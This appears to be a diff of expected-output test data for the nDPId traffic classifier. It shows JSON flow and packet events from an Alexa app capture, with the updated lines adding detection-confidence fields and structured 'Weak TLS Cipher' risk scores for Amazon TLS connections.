 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1490976142629,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976142629,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Si5AAEAGxLmsECrYNu8d\/Z+uAbuBOjwrAAAAAKAC\/\/9GYAAAAgQFtAQCCAoA9nYFAAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":1490976142691,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976142691,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0iJAAOcGldA27x39rBAq2AG7n66gUyr3gTo8LHASH\/4OHAAAAgQFtAEDAwY="}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2482,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":3,"flow_last_seen":1490976142696,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976142696,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoSi9AAEAGxMysECrYNu8d\/Z+uAbuBOjwsoFMq+FAQAVdYjQAA"}
-00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2483,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976142629,"flow_last_seen":1490976142698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1490976142698,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2484,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976142629,"flow_last_seen":1490976142816,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976142816,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2483,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976142629,"flow_last_seen":1490976142698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1490976142698,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2484,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976142629,"flow_last_seen":1490976142816,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1490976142816,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2506,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976150029,"flow_last_seen":1490976150029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976150029,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2506,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1490976150029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976150029,"pkt":"AMDKkaPvePiC0\/vCCABFAAA86ydAAEAGW8esECrYNF7ohrK2AbvOUJPOAAAAAKAC\/\/\/DwQAAAgQFtAQCCAoA9njpAAAAAAEDAwg="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2507,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1490976150125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976150125,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwoZ9AAOcG\/lo0XuiGrBAq2AG7sra0EJrCzlCTz3ASH\/4K2QAAAgQFtAEDAwY="}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2508,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":3,"flow_last_seen":1490976150126,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976150126,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo6yhAAEAGW9qsECrYNF7ohrK2AbvOUJPPtBCaw1AQAVdVSgAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2509,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976150029,"flow_last_seen":1490976150127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976150127,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976150029,"flow_last_seen":1490976150196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976150196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976031691,"flow_last_seen":1490976032855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2154,"flow_avg_l4_payload_len":215,"midstream":0,"ts_msec":1490976150473,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
-00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027958,"flow_last_seen":1490976030758,"flow_idle_time":120000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1490976150473,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00631{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1490976150473,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00629{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1490976023731,"flow_last_seen":1490976031750,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1490976150473,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00664{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976035553,"flow_last_seen":1490976036358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":238,"midstream":0,"ts_msec":1490976150473,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2509,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976150029,"flow_last_seen":1490976150127,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976150127,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976150029,"flow_last_seen":1490976150196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976150196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976031691,"flow_last_seen":1490976032855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2154,"flow_avg_l4_payload_len":215,"midstream":0,"ts_msec":1490976150473,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
+00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027958,"flow_last_seen":1490976030758,"flow_idle_time":120000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1490976150473,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1490976150473,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1490976023731,"flow_last_seen":1490976031750,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1490976150473,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976035553,"flow_last_seen":1490976036358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5712,"flow_avg_l4_payload_len":238,"midstream":0,"ts_msec":1490976150473,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2531,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976158680,"flow_last_seen":1490976158680,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976158680,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2531,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1490976158680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976158680,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8\/ohAAEAGSGasECrYNF7ohrK3Abt2joLDAAAAAKAC\/\/8pLAAAAgQFtAQCCAoA9nxLAAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2532,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1490976158840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976158840,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwc8dAAOcGLDM0XuiGrBAq2AG7sreYM6oZdo6CxHASH\/6AKwAAAgQFtAEDAwY="}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2533,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1490976158841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976158841,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo\/olAAEAGSHmsECrYNF7ohrK3Abt2joLEmDOqGlAQAVfKnAAA"}
-00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2534,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976158680,"flow_last_seen":1490976158842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976158842,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2535,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976158680,"flow_last_seen":1490976159147,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976159147,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1490976044439,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":2175,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
-00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976041156,"flow_last_seen":1490976043655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10376,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2534,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976158680,"flow_last_seen":1490976158842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976158842,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2535,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976158680,"flow_last_seen":1490976159147,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1490976159147,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1490976044439,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":2175,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976041156,"flow_last_seen":1490976043655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10376,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45661,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976041384,"flow_last_seen":1490976042405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1098,"flow_tot_l4_payload_len":2371,"flow_avg_l4_payload_len":131,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45662,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
